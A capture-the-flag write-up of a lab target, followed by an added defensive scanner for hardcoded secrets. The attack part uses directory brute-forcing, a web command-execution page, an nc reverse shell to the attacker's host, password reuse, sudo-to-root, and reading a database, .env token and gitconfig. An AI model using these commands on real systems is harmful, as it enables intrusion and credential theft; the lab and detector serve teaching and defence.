Freelancer Lab
William, as a freelance developer, showcases his completed projects and tasks in his portfolio. Your company is considering working with William; however, before initiating the collaboration, you want to ensure that the developer is reliable and writes secure code.
What is William’s new project?
- I visited the website; at first the answer format and "SEO-friendly" looked like a match, but that is not it.
- I checked robots.txt but found nothing; brute-forcing directories turned up a /projects directory.
┌─[✗]─[root@hackerbox]─[~]
└──╼ #gobuster dir -u http://williamtaylor.hv -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://williamtaylor.hv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 281]
/.htaccess (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/css (Status: 301) [Size: 318] [--> http://williamtaylor.hv/css/]
/devtools (Status: 301) [Size: 323] [--> http://williamtaylor.hv/devtools/]
/img (Status: 301) [Size: 318] [--> http://williamtaylor.hv/img/]
/index.html (Status: 200) [Size: 13198]
/js (Status: 301) [Size: 317] [--> http://williamtaylor.hv/js/]
/projects (Status: 301) [Size: 323] [--> http://williamtaylor.hv/projects/]
/server-status (Status: 403) [Size: 281]
/vendor (Status: 301) [Size: 321] [--> http://williamtaylor.hv/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- Going into /projects, there is one file, new-project.txt; reading it gives the answer:
Project Name: Eco-Friendly
Client: Green Innovations
Client Email Address: contact@greeninnovations.hv
Project Summary:
This project involves developing a website for Green Innovations Ltd., a company dedicated to eco-friendly technologies and sustainable solutions. The primary goal is to create a user-friendly and mobile-responsive website that reflects the company's mission, products, and services. The project aims to provide a platform for increasing environmental awareness and promoting eco-friendly practices.
Scope of the project includes:
- Designing the user experience (UX) and user interface (UI)
- Developing and optimizing content for the website
- Implementing SEO (Search Engine Optimization) strategies
- Ensuring mobile compatibility and responsive design
- Managing user feedback and testing processes
This project seeks to assist Green Innovations Ltd. in achieving its sustainable and eco-friendly objectives and contribute to the enhancement of environmental consciousness.
==> The Answer : Eco-Friendly
What is the full name of the client from whom William has earned the highest income?
- Continuing to look through the directories on the target, I found that the key lies in /devtools, which contains a file called command-line.php. I tried entering a few commands such as pwd, whoami and ls, and it really executed them :))) . hehe!
- I had it open a reverse shell to make finding the answer easier:
nc my-ip my-port -e /bin/bash
- After getting a shell, it had no prompt yet, so I upgraded it to something more usable with:
python3 -c 'import pty; pty.spawn("/bin/bash")'
- I found config.php and read it; the result shows:
www-data@debian:/var/www/williamtaylor.hv$ ls
ls
config.php css devtools img index.html js projects scss vendor
www-data@debian:/var/www/williamtaylor.hv$ cat con*
cat con*
<?php
// Database configuration details
define('DB_HOST', 'localhost'); // Database host address
define('DB_USER', 'william'); // Database username
define('DB_PASSWORD', 'wt-devx-1'); // Database password
define('DB_NAME', 'freelance_jobs'); // Database name
?>
- I logged into the database with the credentials just found, to look for client information and answer this question:
www-data@debian:/var/www/williamtaylor.hv$ mysql -h localhost -u william -p'wt-devx-1' freelance_jobs
<h localhost -u william -p'wt-devx-1' freelance_jobs
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [freelance_jobs]>
- I listed the tables with show tables, saw a table named clients, and reading it gives the result:
MariaDB [freelance_jobs]> show tables;
show tables;
+--------------------------+
| Tables_in_freelance_jobs |
+--------------------------+
| clients |
+--------------------------+
1 row in set (0.000 sec)
MariaDB [freelance_jobs]> select * from clients order by earnings asc;
select * from clients order by earnings asc;
+----+--------------------+----------------------------+----------+
| id | name | email | earnings |
+----+--------------------+----------------------------+----------+
| 13 | Mason Lee | mason.lee@mail.hv | 1800.00 |
| 32 | Zoey Nelson | zoey.nelson@mail.hv | 1800.00 |
| 3 | Noah Miller | noah.miller@mail.hv | 1850.00 |
| 11 | Logan Wilson | logan.wilson@mail.hv | 1900.00 |
| 24 | Madison Wright | madison.wright@mail.hv | 1900.00 |
| 38 | Lila Turner | lila.turner@mail.hv | 1900.00 |
| 29 | Chloe Hill | chloe.hill@mail.hv | 1950.00 |
| 25 | Avery Johnson | avery.johnson@mail.hv | 2000.00 |
| 5 | Ava Jones | ava.jones@mail.hv | 2050.00 |
| 30 | Layla Scott | layla.scott@mail.hv | 2050.00 |
| 16 | Elijah White | elijah.white@mail.hv | 2100.00 |
| 14 | Oliver Perez | oliver.perez@mail.hv | 2150.00 |
| 36 | Nora Diaz | nora.diaz@mail.hv | 2150.00 |
| 4 | Liam Brown | liam.brown@mail.hv | 2200.00 |
| 26 | Ella Martinez | ella.martinez@mail.hv | 2300.00 |
| 37 | Zoe Robinson | zoe.robinson@mail.hv | 2350.00 |
| 27 | Scarlett Hernandez | scarlett.hernandez@mail.hv | 2400.00 |
| 9 | Amelia Rodriguez | amelia.rodriguez@mail.hv | 2450.00 |
| 28 | Grace Lopez | grace.lopez@mail.hv | 2500.00 |
| 10 | Ethan Taylor | ethan.taylor@mail.hv | 2600.00 |
| 21 | Emily Hall | emily.hall@mail.hv | 2600.00 |
| 35 | Luna Carter | luna.carter@mail.hv | 2650.00 |
| 8 | Mia Anderson | mia.anderson@mail.hv | 2750.00 |
| 20 | Abigail Walker | abigail.walker@mail.hv | 2750.00 |
| 34 | Ellie Rivera | ellie.rivera@mail.hv | 2750.00 |
| 7 | Isabella Martinez | isabella.martinez@mail.hv | 2800.00 |
| 18 | Harper Clark | harper.clark@mail.hv | 2850.00 |
| 2 | Olivia Williams | olivia.williams@mail.hv | 2900.00 |
| 33 | Lily Baker | lily.baker@mail.hv | 2900.00 |
| 17 | Charlotte Harris | charlotte.harris@mail.hv | 2950.00 |
| 12 | Lucas Moore | lucas.moore@mail.hv | 3000.00 |
| 6 | Sophia Garcia | sophia.garcia@mail.hv | 3100.00 |
| 23 | Sofia King | sofia.king@mail.hv | 3100.00 |
| 31 | Riley Adams | riley.adams@mail.hv | 3100.00 |
| 1 | Emma Johnson | emma.johnson@mail.hv | 3200.00 |
| 22 | Elizabeth Young | elizabeth.young@mail.hv | 3200.00 |
| 15 | Aiden Thompson | aiden.thompson@mail.hv | 3300.00 |
| 19 | Evelyn Lewis | evelyn.lewis@mail.hv | 7250.00 |
+----+--------------------+----------------------------+----------+
38 rows in set (0.000 sec)
MariaDB [freelance_jobs]>
==> The Answer : Evelyn Lewis
What is the e-mail address William uses on git?
- I searched for all SUID files but found nothing; checking crontab and sudo -l turned up nothing either.
- Then I realised I had william's password. Reading /etc/passwd showed a user william, so I used the password obtained in the previous question and was able to log in:
www-data@debian:/var$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
postgres:x:108:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
william:x:1001:1001:William Taylor,,,:/home/william:/bin/bash
www-data@debian:/var$ su william
su william
Password: wt-devx-1
william@debian:/var$ sudo -l
sudo -l
[sudo] password for william: wt-devx-1
Matching Defaults entries for william on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User william may run the following commands on debian:
(ALL : ALL) ALL
william@debian:/var$
- Checking sudo -l, the good news is that this user has full sudo rights :)))
- I used sudo -i to escalate to root.
- Looking in /home/william, I found the result:
root@debian:/home/william# cd /
cd /
root@debian:/# cd home
cd home
root@debian:/home# ls
ls
lost+found william
root@debian:/home# cd will*
cd will*
root@debian:/home/william# ls
ls
root@debian:/home/william# ls -la
ls -la
total 20
drwxr-xr-x 2 william william 4096 Nov 28 10:01 .
drwxr-xr-x 4 root root 4096 Feb 10 2024 ..
-rw------- 1 william william 0 Nov 28 10:01 .bash_history
-rw-r--r-- 1 william william 220 Feb 10 2024 .bash_logout
-rw-r--r-- 1 william william 3577 Feb 10 2024 .bashrc
-rw-r--r-- 1 william william 68 Feb 10 2024 .gitconfig
root@debian:/home/william# cat ./.gitcon*
cat ./.gitcon*
[user]
name = William Taylor
email = william.dev@williamtaylor.hv
root@debian:/home/william#
==> The Answer : william.dev@williamtaylor.hv
What is the GitHub API Key that William used?
root@debian:/# cd root
cd root
root@debian:~# ls -la
ls -la
total 16
drwx------ 2 root root 4096 Feb 10 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 root root 0 Feb 10 2024 .bash_history
-rw-r--r-- 1 root root 622 Feb 10 2024 .bashrc
-rw------- 1 root root 56 Feb 10 2024 .env
root@debian:~# cat ./.env
cat ./.env
GITHUB_API_KEY=ghp_X12bQ34rT56yZ78uV90wA12bC34dE56fG78h
root@debian:~#
==> The Answer : ghp_X12bQ34rT56yZ78uV90wA12bC34dE56fG78h
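From the defender's side, the two findings that decided this lab were a database password hardcoded in config.php and a GitHub personal access token left in a root-owned .env file. The following is an added example, not part of the original writeup, of a small secret scanner that flags exactly those two patterns over in-memory file contents; the sample files, the token value and the function names are constructed placeholders.

```python
import re
from typing import Dict, List, Tuple

# Hypothetical detector for the two leaks this lab turned up: a database
# password hardcoded via define() in a PHP config file, and a GitHub classic
# personal access token (ghp_ followed by 36 characters) sitting in a .env file.
# Each entry is (label, regex); the secret itself is always capture group 1.
SECRET_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("github_pat", re.compile(r"\b(ghp_[A-Za-z0-9]{36})\b")),
    ("php_define_secret", re.compile(
        r"define\(\s*'(?:DB_PASSWORD|[A-Z_]*(?:SECRET|TOKEN|KEY))'\s*,\s*'([^']*)'\s*\)")),
    ("dotenv_secret", re.compile(
        r"^[A-Z_]*(?:KEY|TOKEN|SECRET|PASSWORD)\s*=\s*(\S+)\s*$", re.MULTILINE)),
]

def mask(value: str) -> str:
    """Keep a 4-character prefix so the report itself never re-leaks the secret."""
    return value[:4] + "..." if len(value) > 4 else "****"

def scan_text(path: str, text: str) -> List[Tuple[str, str, str]]:
    """Return (path, label, masked_secret) for each distinct secret found in text."""
    findings, seen = [], set()
    for label, pattern in SECRET_PATTERNS:
        for match in pattern.finditer(text):
            secret = match.group(1)
            if secret in seen:          # same value hit by two patterns: report once
                continue
            seen.add(secret)
            findings.append((path, label, mask(secret)))
    return findings

def scan_files(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Scan an in-memory {path: contents} map; a real run would read the web root."""
    return [f for path, text in files.items() for f in scan_text(path, text)]

# Constructed sample files shaped like the ones in the lab (values are placeholders).
SAMPLE_FILES: Dict[str, str] = {
    "/var/www/williamtaylor.hv/config.php": (
        "<?php\n"
        "define('DB_HOST', 'localhost');\n"
        "define('DB_USER', 'william');\n"
        "define('DB_PASSWORD', 'example-db-pass'); // constructed placeholder\n"
        "define('DB_NAME', 'freelance_jobs');\n"
        "?>\n"),
    "/root/.env": "GITHUB_API_KEY=ghp_" + "a" * 36 + "\n",   # constructed token
    "/home/william/.gitconfig": "[user]\n\tname = William Taylor\n",
}

if __name__ == "__main__":
    for path, label, shown in scan_files(SAMPLE_FILES):
        print(f"{path}: {label} -> {shown}")
```

Running the scanner in CI over a web root or a repository catches both leaks before a portfolio site ever goes live, and the masked output is safe to paste into a ticket.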